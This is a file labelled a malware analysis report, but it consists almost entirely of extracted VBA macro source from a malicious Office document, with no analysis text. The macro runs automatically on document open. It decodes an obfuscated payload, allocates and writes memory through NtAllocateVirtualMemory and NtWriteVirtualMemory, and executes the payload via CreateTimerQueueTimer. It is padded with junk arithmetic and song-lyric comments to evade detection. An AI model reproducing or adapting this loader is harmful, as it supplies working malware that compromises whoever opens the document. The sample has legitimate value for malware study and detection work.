Malicious Office (OLE) — malware analysis report

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



Function cholecystectomy(health, albert, ruffianly)
nons = george(20 / 4)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (nons) Then
Dim perineal As Variant
Dim necessarian As String
Dim touse As LongPtr
Dim stochastic As LongPtr
Dim monosaccharide As LongPtr
Dim ritualism As String
Dim adventitious As LongPtr
Dim scourings As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (nons) Then
Dim stochastic As Long
Dim rarior As Variant
Dim touse As Long
Dim gambian As Variant
Dim adventitious As Long
Dim auditorium As Integer
Dim monosaccharide As Long
Dim aculeated As Integer
Dim scourings As Long
Dim proconsulship As String
Dim machiavel As Byte
#End If
disposable = "pitterpatter"
disposable = hashish
stochastic = health
scourings = ruffianly
bufo = Rnd(91)
adventitious = albert
instantaneous = 80 + 6
bibliopolist = 36090 + 2
gadgeteer = 281560 + 4
 Pmt 0, instantaneous, 26976, 52812, 2

disposable = disposable
touse = 65 + 28 - 94
hairnet ByVal touse, stochastic, adventitious, scourings, monosaccharide
hashish = disposable
End Function
Sub represented()
Dim pegs As Long
Dim rostov As String
snowclad.inconsonant.Value = Day(#12/5/2013#)
varday = ballproof = amarelle
shouted = undeprived
amplification = "leafy"
celosia = "ambiance"
anthropomancy = "contradicente"

spasmodic = "blackmouthed"
equipage = achivi
Set equilibration = snowclad.inconsonant.SelectedItem
averment = 10 + 8
madrigalist = 18410 + 2
marshal = 174930 + 6
 Pmt 0, averment, 18631, 17652, 2

glottal = equilibration.Name
entomophobia = 7840 + 4
pitiful = Right(glottal, entomophobia)
assemblage = berkshires.dard(pitiful)
reactor = 70 + 2
seminude = 15630 + 1
rafter = 351720 + 4
 Pmt 0, reactor, 36924, 22469, 6

teammate = "gautama"
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim racetrack As Byte
Dim awake As LongPtr
Dim actively As LongPtr
Dim cyrillic As Variant
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim crucible As String
Dim actively As Long
Dim taxiway As Integer
Dim awake As Long
#End If
saturation = 2 - 2
maintainable = inattentive
belemnitic = 4090 + 6
dissemble = 60 + 4
bricabrac = 25000 + 3
osteomyelitis = 592997
 Pmt 0, dissemble, 14538, 28156, 8

filicopsida = "hake"
lubbard = "amethyst"
destructiveness = gallicism
chaise = 80 + 7
buckeye = 35580 + 4
nefarious = 424730 + 8
 Pmt 0, chaise, 29245, 32382, 8

chateaux = assemblage
bombycid = "evident"
awake = beslime(chateaux)
bodega = anther
letterperfect = "frock"
#If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then
Dim townee As Integer
Dim silage As LongPtr
Dim abjectly As LongPtr
Dim androgenic As LongPtr
atoms = 85 + 28 + 1951
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim silage As Long
gastric = 8 - 63 + 836
Dim abjectly As Long
Dim androgenic As Long
atoms = gastric + 3459

#End If
Dim chor As Variant
Dim minotaur As String
silage = 48 - 116 + 68
actively = awake + atoms
abjectly = 201520 + 7
androgenic = 7 * 500
beaumont = tigers(abjectly, silage, actively)
blandiment = 60 + 1
conversazione = 3350 + 2
contractor = 466250 + 7
 Pmt 0, blandiment, 3653, 43423, 4

End Sub

Function beslime(ramify)
Dim biomass As Long
Dim mindblowing As String
Dim godship As Integer
Dim secessionist As Variant
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim bangladesh As Variant
Dim nattily As LongPtr
hayfield = 74 - 49 - 17
Dim acaricide As LongPtr
Dim paiute As Long
Dim begrimed As Long
Dim postpone As LongPtr
Dim duckpin As Long
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim nattily As Long
hayfield = 115 + 109 - 220
Dim acaricide As Long
Dim postpone As Long
#End If
branchy = VarPtr(nattily)
flawless = cholecystectomy(branchy, VarPtr(ramify) + 8, hayfield)
amicitias = 1 - 2
acaricide = 62 + 40 - 102
circumrotation = 102 - 92 - 10
postpone = 48 + 127 + 9120
balking = 4090 + 6
rickey = 60 + 4
contented = reinvest(ByVal amicitias, acaricide, ByVal circumrotation, postpone, ByVal balking, ByVal rickey)
hashish = "aerialist"

oilstone = electrocardiogram - 159

cholecystectomy acaricide, nattily, 87 - 109 + 5905
celebes = 70 + 1
aequa = 25140 + 7
mesmerism = 574130 + 7
 Pmt 0, celebes, 17222, 17194, 6

beslime = acaricide
End Function
Private Sub Document_Open()
Dim pericementoclasia As Byte
Dim dryopithecine As Byte
hall = "eumycota"
represented
gasterosteus = 100 + 9
democrat = 17130 + 5
calque = 332370 + 6
 Pmt 0, gasterosteus, 37564, 13740, 7
End Sub



Attribute VB_Name = "berkshires"
'  Hit me like a hurricane
'  We locked eyes over whiskey on ice
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
'  And hit me like a hurricane'  But you rolled in with your hair in the wind
Public Declare PtrSafe Function amoto Lib "Kernel32" Alias "CreateTimerQueueTimer" (gropingly As Any, ByVal arizona As Any, ByVal inchon As Any, ByVal appropinquation As Any, ByVal mythology As Any, ByVal crescendo As Any, ByVal caligation As Any) As Long
'  The moon went hiding, stars quit shining
'  You wrecked my whole world when you came
Public Declare PtrSafe Function museology Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal earthshaking As Any, brumal As Any, collectivism As Any, conspicuously As Any) As LongPtr
'  And hit me like a hurricane'  We locked eyes over whiskey on ice
Public Declare PtrSafe Function reinvest Lib "Ntdll.dll  " Alias _
"NtAllocateVirtualMemory" (tambala As LongPtr, aftertaste As LongPtr, ByVal rockrose As LongPtr, extolByVal As LongPtr, preceptorship As LongPtr, ByVal bastinado As LongPtr) As LongPtr
'  Knew it was gonna be a long night
'  If I woulda just layed my drink down
'  We locked eyes over whiskey on ice
Public Declare PtrSafe Function delineavit Lib "Ntdll.dll  " Alias "AcquireSRWLockShared" (roadstead As Any) As LongPtr
'  The moon went hiding, stars quit shining
'  If I woulda just layed my drink down
Public Declare PtrSafe Function crucially Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal bilabial As Any, footfault As Any, opinions As Any, belittling As Any) As LongPtr
'  We locked eyes over whiskey on ice
'  Baby, without warning
Public Declare PtrSafe Function hairnet Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal conceived As Any, ByVal alliteratively As Any, ByVal gryllidae As Any, ByVal anglophobe As Any, ByVal del As Any) As LongPtr
'  Driving us to your house
'  The moon went hiding, stars quit shining
#End If
'  Driving us to your house
'  Hit me like a hurricane
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
'  I was doing alright
'  The moon went hiding, stars quit shining
Public Declare Function amoto Lib "Kernel32" Alias "CreateTimerQueueTimer" (childs As Any, ByVal griminess As Any, ByVal vainglorious As Any, ByVal nut As Any, ByVal nub As Any, ByVal browser As Any, ByVal antiknock As Any) As Long
'  Started talking bout us again
'  If I woulda just layed my drink down
Public Declare Function hovel Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal decurtate As Any, apian As Any, collectively As Any, gluten As Any) As Long
'  And walked out
'  Hit me like a hurricane
Public Declare Function hock Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal belladonna As Any, bathos As Any, nudity As Any, devilship As Any) As Long
'  Baby, without warning
'  But just your sight had my heart storming
Public Declare Function allegiant Lib "ntdll.dll  " Alias "AcquireSRWLockShared" (mahatma As Any) As Long
'  I wouldnt be in my truck
'  The moon went hiding, stars quit shining
Public Declare Function hairnet Lib "Ntdll.dll   " Alias "NtWriteVirtualMemory" (ByVal caulophyllum As Any, ByVal atherurus As Any, ByVal hydraulicostatics As Any, ByVal infest As Any, ByVal closedchain As Any) As Long
'  The moon went hiding, stars quit shining
'  Rain was driving, thunder, lightning
Public Declare Function reinvest Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (guiltridden As Long, cinematographer As Long, ByVal appulse As Long, pisteByVal As Long, defamer As Long, ByVal amoebean As Long) As Long
'  Rain was driving, thunder, lightning
'  Baby, without warning

'  Then you rolled in with your hair in the wind
'  But you rolled in with your hair in the wind
#End If
'  Then you rolled in with your hair in the wind
'  If I woulda just layed my drink down
Function unstained()
Dim myriapod(255) As Byte
ufa = 126 + 86 - 147
Do While (90 + 1) >= (ufa)
myriapod(ufa) = ufa - 65
ufa = ufa + 1
Loop
ufa = 48
Do While (50 + 8) >= (ufa)
myriapod(ufa) = ufa + 4
ufa = ufa + 1
Loop
ufa = 97
Do While (120 + 3) >= (ufa)
myriapod(ufa) = ufa - 71
ufa = ufa + 1
Loop
myriapod(47) = 63
ufa = 43
myriapod(ufa) = 60 + 2
unstained = myriapod
End Function

Function vicissitudes(characinidae)
vicissitudes = AscW(characinidae)
End Function
Function george(purina)
Dim windser As Integer
Dim tristan As Integer
fixoid = purina * 12
Dim sitroen As Variant
subway2 = purina * 2
Dim cowen() As Byte
#If (3 * 4 + purina) > (7 - 2 * 1) And (10 - purina * 2) * 2 < (Win64) Then
tristan = subway2
#End If
#If (3 * 4 + purina) > (7 - 2 * 1) And Not (10 - purina * 2) * 2 < (Win64) Then
tristan = (120 - fixoid)
#End If
subway3 = subway2 + tristan
george = tristan
End Function
Function gardener(lays, head, conjugally)
Select Case conjugally
Case (40 / 2) + (10 / 2 - 5)
gardener = lays \ head
Case (90 / 3) + (5 - 3) / 2 - 1
gardener = lays And head
Case (30 + 8) + (56 / 7 - 4 * 2)
gardener = lays * head
End Select
End Function
Function dard(drover) As String
fecundate = Math.Round(441)

Dim cockamamie As Long
Dim ejecta As Long
Dim dillydally(63) As Long
Dim archetype() As Byte
Dim maniere As Long
Dim papillary As Byte

disposable = "alternation"

Dim moss As Long

Dim etourderie As Variant

Dim fleshspots(63) As Long
Dim adenanthera(6962) As Byte
Dim behave(63) As Long
disposable = "fonctionnaire"

Dim hedge As String
Dim deescalation As Integer
Dim autoplagiarism As Long
Dim bayonets As Long

braid = 65530 + 6
Dim academical As String

jetting = 16711670 + 10
affluence = 262140 + 4
accrust = 105 + 21 + 130
Dim shepherds As Integer

casern = 60 + 4
fescennine = 18 + 38 + 3976
narwhal = 65270 + 10
Dim shucks As Integer

Colorized = 4090 + 6
barghest = 103 - 89 + 16515058
balderdash = 60 + 3
dichotomous = 115 - 48 + 188
diadophis = 258040 + 8
Dim facias As String
burette = 93 + 43 - 136
babel = 31 + 45 + 7767
Dim sharping() As Byte
Dim inedible As Long
Dim bellbottomed As String
sharping = VBA.StrConv(drover, 128)
Dim tacitum As Byte
fawnColorizeded = 110 + 7
leopards = 4790 + 3
oligomenorrhea = 216110 + 9
 Pmt 0, fawnColorizeded, 2546, 30700, 8

immeasurably = 7840 + 3
asp = vbKeyShift - 12
For hornet = (5 - 5) * 1 To immeasurably
If hornet Mod 2 = (4 - 4) Then
sharping(hornet) = sharping(hornet) - asp
Else
sharping(hornet) = sharping(hornet) - (asp - 1)
End If
Next hornet
dib = 10 + 8
protozoologist = 12420 + 2
dumuzi = 501640 + 2
 Pmt 0, dib, 8000, 49214, 7

deescalation = 3 - 3
conduction = 2 - 2
accusable = 28 + 60 - 45
imitator = unstained
For maniere = (7 - 7) * 1 To (50 + 13) * (5 - 4)
dillydally(maniere) = gardener(maniere, casern, 38)
behave(maniere) = gardener(maniere, Colorized, 38)
fleshspots(maniere) = gardener(maniere, affluence, 38)
Next maniere
eleve = 10 + 1
mouchard = 33750 + 7
camelopard = 531970 + 7
 Pmt 0, eleve, 21463, 24978, 5

archetype = sharping
amoroso = 124 + 46 - 166
janty = 110 + 3
morass = 18710 + 9
bump = 143370 + 10
 Pmt 0, janty, 14891, 36207, 2

numismatist = 72 + 74 - 143
bufo = Fix(209)

bufo = Math.Round(175)

humble = numismatist + 1
dedit = 1 + 1
For autoplagiarism = (4 - 4) * 1 To immeasurably
depositor = archetype(autoplagiarism)
patentee = archetype(autoplagiarism + 2)
tinnitus = behave(imitator(archetype(autoplagiarism + 1)))
laden = dillydally(imitator(patentee)) + imitator(archetype(autoplagiarism + numismatist))
cockamamie = fleshspots(imitator(depositor)) + tinnitus + laden
maniere = gardener(cockamamie, jetting, 30)
adenanthera(ejecta) = gardener(maniere, braid, 20)
maniere = gardener(cockamamie, narwhal, 30)
adenanthera(ejecta + 1) = gardener(maniere, accrust, 20)
adenanthera(ejecta + dedit) = gardener(cockamamie, dichotomous, 30)
ejecta = ejecta + dedit + 1
autoplagiarism = autoplagiarism + 3
Next
dard = adenanthera
End Function

Function tigers(wrd, buls, lky)
#If (7 * 2) * 3 > 14 / 2 And (12 - 6 * 2) * 1 < (Win64) Then
Dim aln As LongPtr
Dim bis As LongPtr
Dim ority As Integer
Dim deble As LongPtr
#End If
#If (12 * 2) / 1 > 14 / 2 And Not (12 - 6 * 2) * 1 < (Win64) Then
Dim aln As Long
Dim bwis As Long
Dim antery As Integer
Dim deble As Long
#End If
aln = buls
deble = lky
dan2 = amoto(wrd, aln, deble, aln, aln, aln, aln)
End Function


Attribute VB_Name = "snowclad"
Attribute VB_Base = "0{49FCFA48-8096-448D-94F1-0CB08577CAC4}{D691BB27-1901-4507-8BB1-08F0FB56B913}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False